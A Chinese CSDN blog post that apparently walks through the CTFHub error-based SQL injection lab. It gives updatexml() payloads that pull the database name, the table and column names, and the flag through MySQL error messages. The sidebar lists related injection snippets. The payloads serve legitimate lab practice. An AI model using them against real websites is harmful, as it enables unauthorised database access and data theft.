CTFHub技能树web(持续更新)--SQL注入--报错注入

最新推荐文章于 2024-04-10 20:54:23 发布
最新推荐文章于 2024-04-10 20:54:23 发布
阅读量561 收藏 4
点赞数
分类专栏: CTFHub
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jiuyongpinyin/article/details/108009477
版权

报错注入

首先题目提示是报错注入,我们先尝试and 1=1 万能测试句:
在这里插入图片描述
发现是存在注入的,接着我们报错出数据库:
在这里插入图片描述

?id=1 and updatexml(1,concat('~',database()),1) --+

报错出当前数据库是sqli,接着我们报错出表:
在这里插入图片描述

?id=1 and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='sqli')),1) --+

这里说一下为什么要用group_concat,这段代码是将所有数据显示出来,以防止数据库中有多个列需要我们一个一个的来爆破,而concat的作用是将数据拿一个符号连接起来。
接下来我们爆破flag这个表里面的列:
在这里插入图片描述

?id=1 and updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_name='flag')),1) --+

最后我们字段:
在这里插入图片描述

?id=1 and updatexml(1,concat('~',(select flag from flag)),1) --+

得到flag,但是flag得到的并不全,试了好多方法都不行,如果有大佬知道手工的方法请私聊我,最后我使用sqlmap得到的全部flag:
在这里插入图片描述

注:萌新第一次写write up,不足之处还请见谅,不对之处欢迎批评指正。

拼音怪兽
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CTFHUB——SQL 报错注入三种方法全解
wuuconix's blog
08-25 2886
背景 Sql注入主要有三种方法,extractvalue和updatexml函数形成的xpath报错,这算两种。还有一种就是floor实现的group by主键重复,这算另外一种。 本篇文章将对CTFHUB中的SQL报错注入题目从头到尾对这三种方法进行实践。 利用extractvalue来xpath报错。 1 and (select extractvalue(1, concat(0x7e, (select database())))) 1 and (select extractvalue(1, conc
CTFHub - 报错注入
Have_a_great_day的博客
09-09 606
欢迎各位师傅以kill -9 的威力对文章进行检查,Zeus会认真分析听取各位师傅的留言。
ctfhubSQL注入报错注入
manerzi的博客
10-08 252
SQL注入报错注入
CTFHub | 报错注入
尼泊罗河伯的博客
10-28 2530
因为报错注入的语句比较多,测试了几个语句发现 extractvalue 语句存在 SQL 报错注入漏洞,得到数据库名称 sqli 后,查询数据库表名,发现一个可疑表名 flag 。检查这个 flag 表中的列,发现一个列名为 flag ,查询数据发现此题 flag 。发现数据不完整,使用 mid 函数进行查询从字符 2 开始得到完整数据。
CtfhubSQL注入|SQL报错注入及原理详解
tempulcc的博客
10-10 1480
手工测试sql注入及原理1、SQL 整数型注入查数据库名查数据表查flag表字段2、字符型注入3、报错注入updatexml() 函数致MYSQL显错注入原理updatexml() 函数定义updatexml() 函数运行机制updatexml() 函数运行示例不报错示例构造报错利用updatexml()测试ctfhub的显错注入 1、SQL 整数型注入 查数据库名 -1 union select group_concat(schema_name),2 from information_schema.sch
web-报错注入-皮卡丘靶场
07-15
报错注入】是一种安全漏洞,它发生在Web应用程序中,当用户输入的数据被错误地用于构造数据库查询时,导致数据库返回错误信息。这些错误信息可能包含敏感数据,从而让攻击者能够获取未授权的信息或者控制数据库。...
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
安装之前,务必先了解可能遇到的问题,例如初始化数据库时连接不上的问题和 mysqli_connect 函数报错的问题。 知识点 3: sqli-labs 下载和配置 下载 sqli-labs 工程,文件名为 sqli_labs_sqli-for7.zip。将下载好...
超级SQL注入工具-web-sql
10-28
超级SQL注入工具是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入 支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle...
sqIi-labs,SQL注入平台
08-06
sqIi-labs:是一款学习SQL注入的开源平台,共有75种不同类型的注入 解压密码:ms08067.com sqIi-labs的使用文章见:https://blog.csdn.net/qq_41453285/article/details/100827739
CTFHub-SQL注入
yuqie的博客
06-13 892
当传入的ID参数为and 1=2时,由于1=2不成立,所以返回假,页面就会返回与id=1不同的结果。需要注意的是,当level默认为1的时候,默认不扫cookie的内容,必须是level大于等于2才能扫cookie里的内容,所以这里选用level 2.很明显,直接使用rand函数每次产生的数值不一样,但当我们提供了一个固定的随机数的种子0之后,每次产生的值都是相同的,这也可以称之为伪随机。配合上floor函数就可以产生确定的两个数,即0和1并且结合固定的随机种子0,它每次产生的随机数列都是相同的值。
CTFhub SQL注入
weixin_62420492的博客
01-28 2970
整数型注入 基本步骤 检查是否存在注入 and 1=1 返回正确 and 1=2 返回错误 猜字段数 order by x 得出字段数 爆数据库名 ? id=1 and 1=2 union select 1,database() 爆表名 ? id=1 and 1=2 union select 1,group_concat(table_name) from information_schema.rables where table _schema='sqli' 得到表名n
CTFHUB-SQL注入-报错注入
m0_64180167的博客
11-29 836
报错注入是在网站提供查询时进行SQL注入在用户输入了错误的信息时 网站进行报错处理但是提交的不进行审查 就会让代码随着报错指令进入目录。
ctfhub技能树SQL注入报错注入
2303_81631620的博客
04-03 849
1.判断注入类型,场景中仅仅将SQL语句带入查询返回页面正确,没有返回点的时候,需要报错注入,用报错的回显extractvalue报错注入:0x7e就是~用来区分数据里面用select语句,不能用union selectconcat()函数1).功能:将多个字符串连接成一个字符串。2).语法:concat(str1,str2,…)返回结果为连接参数产生的字符串,如果有任何一个参数为null,则返回值为null。2.查询当前使用的数据库,报错,出现库名 sqli3.
CTFHub SQL注入(二)
最新发布
2301_80911344的博客
04-10 893
适用情况:页面有数据库的报错信息报错信息必须是动态的、来自数据库的报错信息。网站写死的、自定义的报错提示不算。参数中添加单/双引号,页面报错才可进行下一步。?id=1' -- a参数中添加报错函数,检查报错信息是否正常回显?3. 脱库:.获取所有数据库?substr(, 1 , 31)),3) -- a.获取所有表?substr(, 1 , 31)),3) -- a.获取所有字段?
CTFHUB-WEB-SQL注入
K_ShenH的博客
06-09 1027
CTFHUB-WEB-SQL注入
CTFHub-sql注入
qq_60905276的博客
01-30 5680
1.整数型注入 先判断有没有注入点 ?id=1 and 1=1 ?id=1 and 1=2 证明有注入点 在输入1看看。 有回显。
CTFHub_技能树_WebSQL注入——报错注入详细原理讲解(含三种解法原理讲解)
Ho1aAs‘s Blog
12-20 1034
文章目录一、报错注入原理报错注入常用函数floor()extractvalue()、updatexml()原理二、注入过程Ⅰ、使用floor()1.查询表名2.查询列名3.查值Ⅱ、使用extractvalue()1.查询表名2.查询列名3.查值Ⅲ、使用updatexml()1.查询表名2.查询列名3.查值 一、报错注入原理 报错注入,通过运行SQL查询语句,回显查询结果。由于某些函数的神奇操作会使得传入参数先运行,而被报错抛出,能够直接查看参数的运行情况,因而实现查询。 报错注入常用函数 《代码审计:企业
CTFHub技能树-Web-SQL注入
qq_54037445的博客
11-28 323
CTFHub技能树-Web-SQL注入 cookie注入、UA注入、refer注入
sqli-labs实验指导手册
11-17
"sqli-labs实验指导手册详细介绍了如何通过搭建sqli-labs实验平台来学习和实践SQL注入攻击及防御。本实验手册主要针对基于单引号的字符型联合注入进行深入解析,帮助读者理解SQL注入的原理,并提供逐步解密数据库...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值